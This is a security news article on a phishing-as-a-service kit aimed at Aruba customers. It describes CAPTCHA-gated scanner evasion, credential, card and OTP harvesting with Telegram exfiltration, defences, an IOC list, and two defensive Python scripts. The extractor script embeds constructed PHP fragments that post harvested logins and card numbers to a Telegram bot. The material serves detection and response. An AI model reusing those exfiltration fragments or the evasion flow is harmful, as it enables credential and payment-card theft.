Categories: Cyber Security News

A Multi-Stage Telegram Phishing Framework for Credential Theft and Detection Bypass

Phishing attacks have moved far beyond basic email scams. Campaigns now run on purpose-built frameworks and automation designed to slip past conventional defenses.

Group-IB’s recent research on an industrialized phishing kit targeting the Italian hosting and cloud provider Aruba S.p.A. illustrates the shift: phishing-as-a-service (PhaaS) is now a mature offering, and the criminal ecosystem around it is increasingly organized.

Multi-Stage Automation and Detection Evasion

The campaign starts with spear-phishing emails sent to Aruba customers, manufacturing urgency with claims that a service is about to expire or a payment has failed.

The emails link to high-fidelity clones of Aruba’s login pages with the victim’s email address already filled in, which makes the lure considerably more convincing. The attack then unfolds in stages. The first is a CAPTCHA challenge: automated URL scanners, crawlers and sandboxes cannot get past it, so security tooling sees only an innocuous page while genuine users are let through to the phishing content.

Once the CAPTCHA is solved, the victim walks through replicas of Aruba’s login and payment portals. Credentials are harvested first; a fake payment step then asks for full card details to cover a small, plausible renewal fee.

The final stage is a counterfeit 3D Secure or OTP form that captures the one-time code the bank sends for the transaction. Because such codes expire within minutes, the operator uses the stolen card data and code straight away to authorize the fraudulent payment.

After each stage the victim is redirected to the legitimate Aruba website, so the session ends on a real page and the theft is less likely to be noticed.

Telegram-Centric Infrastructure and Response

Central to the campaign is Telegram, used both as a control hub and as the exfiltration channel. Every piece of captured data is pushed immediately to an attacker-controlled Telegram bot; if that delivery fails, the kit falls back to writing the data to a local file on the phishing server. For responders this matters twice over: the bot token and chat ID embedded in the kit identify the operator’s channel and can be reported to Telegram for abuse, and the fallback file on a seized or taken-down host may still hold victim data.
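The exfiltration pattern described above leaves a recognisable footprint in kit source code: a Bot API URL of the form api.telegram.org/bot&lt;token&gt;/sendMessage, a chat_id, and a local file write as fallback. The following is an added example of how an analyst might pull those indicators out of a recovered kit; it is not code from the Aruba kit or from Group-IB. The two PHP fragments are constructed here to exercise the extractor (one keeps the token in a variable, one inlines it in the URL), and the tokens and chat IDs in them are fake.

```python
import re

# Constructed sample 1: token and chat_id held in PHP variables, sent via cURL,
# with a local-file fallback when Telegram is unreachable. Fake values.
SAMPLE_KIT_SOURCE = r'''
<?php
$token = "123456789:AAFakeTokenFakeTokenFakeTokenFake01";
$chat_id = "-1001234567890";
$msg = "Login | Email: " . $_POST['email'] . " | Pass: " . $_POST['pass'];
$ch = curl_init("https://api.telegram.org/bot{$token}/sendMessage");
curl_setopt($ch, CURLOPT_POSTFIELDS, ['chat_id' => $chat_id, 'text' => $msg]);
$ok = curl_exec($ch);
if ($ok === false) {
    // fallback when Telegram is unreachable
    file_put_contents("result.txt", $msg . PHP_EOL, FILE_APPEND);
}
header("Location: https://www.aruba.it/");
?>
'''

# Constructed sample 2: token and chat_id inlined in a GET request, no fallback.
SAMPLE_KIT_SOURCE_INLINE = r'''
<?php
$msg = "Card | " . $_POST['pan'] . " | " . $_POST['exp'] . " | " . $_POST['cvv'];
$r = @file_get_contents("https://api.telegram.org/bot987654321:AAF0123456789abcdefghijklmnopqrstuv/sendMessage?chat_id=123456789&text=" . urlencode($msg));
?>
'''

# Telegram bot tokens are "<numeric bot id>:<35 chars of [A-Za-z0-9_-]>".
TOKEN_RE = r"\d{8,10}:[A-Za-z0-9_-]{35}"
# Simple PHP string assignments: $name = "literal";
ASSIGN_RE = re.compile(r"""\$(\w+)\s*=\s*(['"])(.*?)\2\s*;""")
# Bot API URL with either a literal token or an interpolated PHP variable.
BOT_URL_RE = re.compile(
    r"api\.telegram\.org/bot(?P<tok>" + TOKEN_RE + r"|\{?\$\w+\}?)/(?P<method>\w+)"
)
# chat_id given as array key, query parameter or assignment; literal or variable.
CHAT_RE = re.compile(
    r"""chat_id['"]?\s*(?:=>|=|:)\s*(?P<val>['"]?-?\d{5,}['"]?|\{?\$\w+\}?)"""
)
# Heuristic for the "save locally if Telegram fails" fallback.
LOCAL_WRITE_RE = re.compile(r"\b(file_put_contents|fwrite|fopen)\s*\(")


def _resolve(value, assignments):
    """Turn a literal or a $variable / {$variable} reference into its string value."""
    if value.startswith(("$", "{$")):
        return assignments.get(value.strip("{}").lstrip("$"))
    return value.strip("'\"")


def extract_telegram_exfil(source):
    """Return one finding per Telegram Bot API call found in the kit source."""
    assignments = {name: val for name, _quote, val in ASSIGN_RE.findall(source)}
    chat_match = CHAT_RE.search(source)
    chat_id = _resolve(chat_match.group("val"), assignments) if chat_match else None
    findings = []
    for m in BOT_URL_RE.finditer(source):
        token = _resolve(m.group("tok"), assignments)
        findings.append({
            "line": source.count("\n", 0, m.start()) + 1,
            "method": m.group("method"),
            "token": token,
            "bot_id": token.split(":")[0] if token else None,
            "token_valid_format": bool(token and re.fullmatch(TOKEN_RE, token)),
            "chat_id": chat_id,
            "local_fallback": bool(LOCAL_WRITE_RE.search(source)),
        })
    return findings


if __name__ == "__main__":
    for name, src in (("variable", SAMPLE_KIT_SOURCE), ("inline", SAMPLE_KIT_SOURCE_INLINE)):
        for f in extract_telegram_exfil(src):
            shown = dict(f, token=(f["token"][:12] + "...") if f["token"] else None)
            print(name, shown)
```

The bot ID and chat ID are what an abuse report to Telegram needs; the full token should be handled as a secret during the investigation rather than pasted into tickets. The variable-resolution step only follows simple string assignments, so a kit that builds the token by concatenation or base64 will need the analyst to decode it by hand first.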

Telegram is also used to distribute and sell phishing kits and to facilitate support and collaboration among cybercriminals, mimicking legitimate software-as-a-service businesses in structure and scale.

Because the kits are cheap, automated and widely available, criminals with little technical skill can run attacks of this sophistication.

To defend against these threats, organizations should deploy secure email gateways, enforce email authentication (SPF, DKIM and DMARC with an enforcing policy), monitor for lookalike and phishing domains and report them for takedown, and adopt zero-trust network strategies.

End users should verify suspicious messages through an independent channel, avoid clicking unsolicited links, and enable the strongest multi-factor authentication available. SMS and app-generated one-time codes can be relayed in real time, as the OTP stage of this kit shows; passkeys and other FIDO2 authenticators are bound to the legitimate site’s origin and cannot be replayed from a phishing page.

This industrialization of phishing demands an equally disciplined and intelligence-driven response from defenders, as attacks increasingly resemble agile, well-supported enterprises.

Indicators of Compromise (IOCs)

Network IOCs

Domain IP
serdegogozedeytid[.]bulkypay[.]xyz 23[.]239[.]109[.]118
serdegogozedeytidtelerstore[.]marina[.]am 192[.]250[.]229[.]24
scarecrow[.]metalseed[.]you2[.]pl 109[.]95[.]159[.]70
wordpress-1512889-5811853[.]cloudwaysapps[.]com 45[.]77[.]157[.]140
firsijdaeeuetevcbcsj[.]cfolks[.]pl 185[.]208[.]164[.]121
arb-app[.]nero-network[.]eu 185[.]25[.]23[.]155
srv229641[.]hoster-test[.]ru 31[.]28[.]24[.]131
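The IOC table above is published defanged (dots written as [.]), which is the right way to share it but not the form a log search needs. As an added example, not part of the article, the script below refangs the table, then sweeps constructed proxy log lines for the listed FQDNs (and their subdomains) and IPs. The log format and all client addresses are invented for the example; the matching deliberately does not extend to parent zones such as cloudwaysapps.com or cfolks.pl, which are shared hosting platforms with many legitimate tenants.

```python
import re

# Network IOCs from the article, kept in the defanged form in which they were published.
IOC_TABLE = """\
serdegogozedeytid[.]bulkypay[.]xyz 23[.]239[.]109[.]118
serdegogozedeytidtelerstore[.]marina[.]am 192[.]250[.]229[.]24
scarecrow[.]metalseed[.]you2[.]pl 109[.]95[.]159[.]70
wordpress-1512889-5811853[.]cloudwaysapps[.]com 45[.]77[.]157[.]140
firsijdaeeuetevcbcsj[.]cfolks[.]pl 185[.]208[.]164[.]121
arb-app[.]nero-network[.]eu 185[.]25[.]23[.]155
srv229641[.]hoster-test[.]ru 31[.]28[.]24[.]131
"""

# Constructed proxy log lines: "<timestamp> <client> <dest host> <dest ip> <status>".
# Addresses and hostnames other than the IOCs are invented.
LOG_LINES = [
    "2025-06-02T09:14:03Z 10.10.4.21 www.aruba.it 198.51.100.10 200",
    "2025-06-02T09:14:41Z 10.10.4.21 serdegogozedeytid.bulkypay.xyz 23.239.109.118 200",
    "2025-06-02T09:15:07Z 10.10.7.3 cdn.arb-app.nero-network.eu 185.25.23.155 200",
    "2025-06-02T09:16:22Z 10.10.9.8 blog.cloudwaysapps.com 203.0.113.5 200",
    "2025-06-02T09:17:45Z 10.10.2.14 update.example.net 109.95.159.70 200",
]

LOG_RE = re.compile(
    r"^(?P<ts>\S+) (?P<client>\S+) (?P<host>\S+) (?P<dst_ip>\S+) (?P<status>\d+)$"
)


def refang(value):
    """Undo common defanging: [.] or (.) for dots, hxxp for http."""
    value = re.sub(r"[\[(]\.[\])]", ".", value)
    return re.sub(r"^hxxp", "http", value, flags=re.IGNORECASE)


def parse_ioc_table(text):
    """Return (domain -> ip, ip -> domain) from a two-column defanged table."""
    domains, ips = {}, {}
    for line in text.splitlines():
        parts = line.split()
        if len(parts) != 2:
            continue  # skip headers and blank lines
        domain = refang(parts[0]).lower().rstrip(".")
        ip = refang(parts[1])
        domains[domain] = ip
        ips[ip] = domain
    return domains, ips


def domain_matches(host, ioc_domains):
    """Match the exact IOC FQDN or a subdomain of it, never a parent zone."""
    host = host.lower().rstrip(".")
    for d in ioc_domains:
        if host == d or host.endswith("." + d):
            return d
    return None


def match_logs(lines, domains, ips):
    """Return one hit per log line that touches an IOC domain or IP."""
    hits = []
    for n, line in enumerate(lines, 1):
        m = LOG_RE.match(line)
        if not m:
            continue
        matched = {}
        d = domain_matches(m["host"], domains)
        if d:
            matched["domain"] = d
        if m["dst_ip"] in ips:
            matched["ip"] = m["dst_ip"]
        if matched:
            hits.append({"line": n, "client": m["client"], "matched_on": matched})
    return hits


if __name__ == "__main__":
    doms, ips = parse_ioc_table(IOC_TABLE)
    for hit in match_logs(LOG_LINES, doms, ips):
        print(hit)
```

The fifth log line matches on IP alone: phishing infrastructure is frequently re-pointed to fresh hostnames while the server stays put, so an IP-only hit still deserves a look even though IPs on shared hosting age faster than domains.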


The post A Multi-Stage Telegram Phishing Framework for Credential Theft and Detection Bypass appeared first on Cyber Security News.
